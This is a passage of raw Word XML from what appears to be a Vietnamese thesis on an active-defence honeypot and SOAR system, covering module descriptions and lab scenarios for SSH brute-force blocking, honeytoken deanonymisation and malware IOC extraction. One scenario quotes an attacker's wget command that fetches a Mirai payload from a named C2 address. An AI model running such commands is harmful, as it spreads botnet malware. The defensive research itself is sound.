                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>socket, requests, ip-api, AbuseIPDB API</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>core/honeytoken_manager.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Sinh file bẫy mồi (AWS, Bash, SQL) và xử lý khử ẩn danh Hacker</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>uuid, os, hashlib, HTTP Webhook</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>core/payload_analyzer.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Phân tích tĩnh mã độc, trích xuất IOCs IP/URL và tra cứu VirusTotal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>hashlib, re, VirusTotal v3 API</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>core/soar_enforcer.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Thực thi chặn iptables/nftables, điều hướng Tarpit và quản lý Whitelist</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>subprocess, platform, iptables, nat</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>core/telegram_soar_bot.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Gửi thẻ cảnh báo và xử lý tương tác nút bấm 2 chiều từ điện thoại</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Telegram Bot API, inline_keyboard, threading</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>main.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Khởi tạo, nạp cấu hình YAML và điều phối luồng xử lý toàn hệ thống</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>pyyaml, sys, logging</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="120" w:line="312" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="312" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="003366"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>CHƯƠNG 5: THỬ NGHIỆM THỰC TẾ, ĐÁNH GIÁ VÀ PHÂN TÍCH TẤN CÔNG</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="142850"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>5.1 Thiết lập Môi trường Thử nghiệm Thực tế (Lab Setup)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Để kiểm chứng toàn diện năng lực của Hệ thống Active Defense &amp; SOAR, môi trường thực nghiệm được thiết lập theo mô hình diễn tập Red Team vs. Blue Team trên hạ tầng mạng ảo hóa:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>• Máy chủ Blue Team (Phòng thủ &amp; Mini-SOC): Cấu hình Ubuntu Server 22.04 LTS, 4 vCPU, 8GB RAM, chạy Cowrie Honeypot (chuyển hướng cổng 22 sang 2222), dịch vụ Tarpit Endlessh tại cổng 22222 và toàn bộ hệ thống Python Orchestrator.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>• Máy trạm Red Team (Kẻ tấn công): Máy ảo Kali Linux 2024.1 trang bị các công cụ tấn công dò quét hàng đầu (Hydra, Medusa, Nmap, Metasploit Framework, Paramiko Brute-force Script).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>• Bộ công cụ Giả lập Tự động ('scripts/simulate_attack.py'): Được phát triển để tái hiện chính xác các chuỗi sự kiện tấn công phức tạp nhằm đo đạc thời gian đáp ứng chuẩn xác ở cấp độ mili-giây.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="142850"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>5.2 Kịch bản 1: Mô phỏng Tấn công Dò quét SSH Brute-force &amp; Hiệu quả Chặn tức thời</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Trong kịch bản này, máy Red Team (IP: 185.220.101.5) sử dụng công cụ Hydra phát động cuộc tấn công từ điển nhắm vào tài khoản root với danh sách 100 mật khẩu phổ biến nhất. Tốc độ thử nghiệm là 10 request/giây.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Diễn biến xử lý của Hệ thống SOAR:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>1. Tại 4 lần thử đầu tiên, Cowrie ghi nhận sự kiện 'cowrie.login.failed', Correlation Engine cập nhật bộ đếm vào danh sách trượt thời gian.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>2. Tại lần thử thứ 5 (đạt ngưỡng threshold = 5 trong 60 giây), Correlation Engine lập tức nâng cấp sự cố lên mức HIGH, gán nhãn kỹ thuật 'MITRE ATT&amp;CK T1110.001 - Brute Force: Password Guessing'.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>3. Playbook tự động của SOAR Enforcer được kích hoạt: chèn lệnh iptables DROP địa chỉ IP 185.220.101.5 trong thời gian 3600 giây.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>4. Toàn bộ tiến trình Hydra phía kẻ tấn công bị ngắt kết nối đột ngột (Connection Timed Out).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>5. Đồng thời, một Thẻ cảnh báo sự cố kèm kết quả trinh sát GeoIP (Đức / Tor Exit Node) và nút bấm can thiệp được gửi tới điện thoại của Chuyên viên SOC qua Telegram trong vòng 1.2 giây.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="142850"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>5.3 Kịch bản 2: Hacker Xâm nhập Thành công và Kích hoạt Bẫy Honeytoken (Khử ẩn danh Real IP)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Trong kịch bản này, hacker sử dụng một máy chủ VPN tại Hà Lan (IP: 45.33.32.156) để dò trúng mật khẩu yếu 'password123' và đăng nhập thành công vào Honeypot:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>1. Ngay khi đăng nhập, sự kiện 'cowrie.login.success' kích hoạt Cảnh báo Mức độ CRITICAL (MITRE T1078 - Valid Accounts). Hệ thống lập tức khởi động chế độ 'Silent Monitoring &amp; Deep Deception' thay vì chặn ngay, nhằm thu thập thêm bằng chứng.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>2. Hacker tiến hành trinh sát nội bộ bằng các lệnh 'whoami', 'uname -a' (kích hoạt cảnh báo MITRE T1082).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>3. Hacker phát hiện tệp tin mồi nhử '/root/.aws/credentials' do HoneytokenManager gài sẵn và thực hiện lệnh 'cat' để đánh cắp (kích hoạt MITRE T1552.001).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>4. Khử ẩn danh: Hacker sao chép thông tin tài khoản và đường link kiểm tra trong file về trình duyệt máy tính cá nhân thật tại Việt Nam để kiểm tra xem tài khoản AWS có hoạt động không. Ngay lập tức, Canary Webhook Server ghi nhận HTTP Request từ địa chỉ IP thật của hacker (ví dụ: 14.161.x.x - Mạng Viettel Internet cáp quang), đi kèm User-Agent trình duyệt Chrome trên Windows 11.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>5. Nhờ đó, lớp vỏ bọc VPN Hà Lan của hacker bị bóc trần hoàn toàn, định danh chính xác vị trí thực tế của thủ phạm.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="142850"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>5.4 Kịch bản 3: Tải Payload Độc hại lên Hệ thống và Phân tích Trích xuất IOCs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Hacker thực thi lệnh tải mã độc từ xa: 'wget http://194.87.139.12/mirai_payload.sh'.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>1. Cowrie tự động tải tệp tin về thư mục an toàn 'var/lib/cowrie/downloads' và phát sinh sự kiện 'cowrie.session.file_download' (kích hoạt MITRE T1105 - Ingress Tool Transfer).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>2. Phân hệ 'PayloadAnalyzer' tự động tính toán mã băm SHA256 và bóc tách chuỗi tĩnh. Kết quả phát hiện đoạn mã có chứa địa chỉ IP máy chủ C2 '194.87.139.12' và chữ ký nhận dạng botnet 'dvrHelper' (Mirai variant).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>3. Kết quả truy vấn VirusTotal API xác nhận đây là biến thể độc hại của dòng họ mã độc 'Trojan.Linux.Mirai' với tỷ lệ nhận diện 48/72 engines cảnh báo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>4. Toàn bộ các chỉ số IOCs (Hash, IP C2, URL tải) được tự động xuất bản vào Threat Feed chung để cảnh báo toàn bộ hệ thống.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="142850"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>5.5 Kịch bản 4: Kỹ thuật Giam lỏng Tarpit làm Kiệt quệ Luồng Tấn công của Botnet</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
